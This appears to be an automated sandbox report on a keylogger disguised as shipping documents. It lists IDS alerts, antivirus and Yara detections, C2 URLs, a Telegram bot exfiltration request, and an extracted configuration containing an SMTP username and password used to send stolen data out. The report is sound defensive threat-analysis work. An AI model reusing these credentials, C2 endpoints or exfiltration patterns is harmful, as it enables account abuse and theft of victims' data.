Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T15:08:04.141020+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-09T15:08:05.172367+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-09T15:08:06.516013+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T15:08:16.073489+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49726	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: phishing
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: phishing
Source: http://varders.kozow.com:8081	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

Avira: detection malicious, Label: HEUR/AGEN.1310026

Found malware configuration

Source: 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446F1B5h	0_2_0446EE78
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446DA33h	0_2_0446D788
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04464ED1h	0_2_04464C28
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04465781h	0_2_044654D8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04468749h	0_2_044684A0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04468FF9h	0_2_04468D50
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446C021h	0_2_0446BD78
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446DFC1h	0_2_0446DD18
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446E871h	0_2_0446E5C8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04466031h	0_2_04465D88
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 044698A9h	0_2_04469600
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446C8D1h	0_2_0446C628
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 044668E1h	0_2_04466638
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446D181h	0_2_0446CED8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04467191h	0_2_04466EE8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446A159h	0_2_04469EB0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446AA09h	0_2_0446A760
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 044641C9h	0_2_04463F20
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04464A79h	0_2_044647D0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04467A41h	0_2_04467798
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 044682F1h	0_2_04468048
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04468BA1h	0_2_044688F8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04465329h	0_2_04465080
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446E419h	0_2_0446E170
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446BBC9h	0_2_0446B920
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04465BD9h	0_2_04465930
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446C479h	0_2_0446C1D0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04466489h	0_2_044661E0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04469451h	0_2_044691A8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04469D01h	0_2_04469A58
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446ECC9h	0_2_0446EA20
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446CD29h	0_2_0446CA80
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04466D39h	0_2_04466A90
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 044675E9h	0_2_04467340
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04464621h	0_2_04464378
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446A5B1h	0_2_0446A308
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0446D5D9h	0_2_0446D330
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 04467E99h	0_2_04467BF0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then push 00000000h	0_2_044DC5AD
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_044D7AF8
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_044D7AF6
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A159CD9h	0_2_0A159A18
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A15A418h	0_2_0A15A000
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A1581CDh	0_2_0A157FE1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A158B57h	0_2_0A157FE1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_0A157B33
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A15A418h	0_2_0A15A346
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A156FEDh	0_2_0A15703C
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A156FEDh	0_2_0A156E50
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then jmp 0A15A418h	0_2_0A159FF0
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_0A157D13
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_0A157500

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49726 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.5:49766 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2009/01/2025%20/%2022:02:41%0D%0ACountry%20Name:%20United%20States%0D%0A[%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 208.91.199.223 208.91.199.223
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.21.80.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49766 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2009/01/2025%20/%2022:02:41%0D%0ACountry%20Name:%20United%20States%0D%0A[%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 14:08:15 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024C4000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
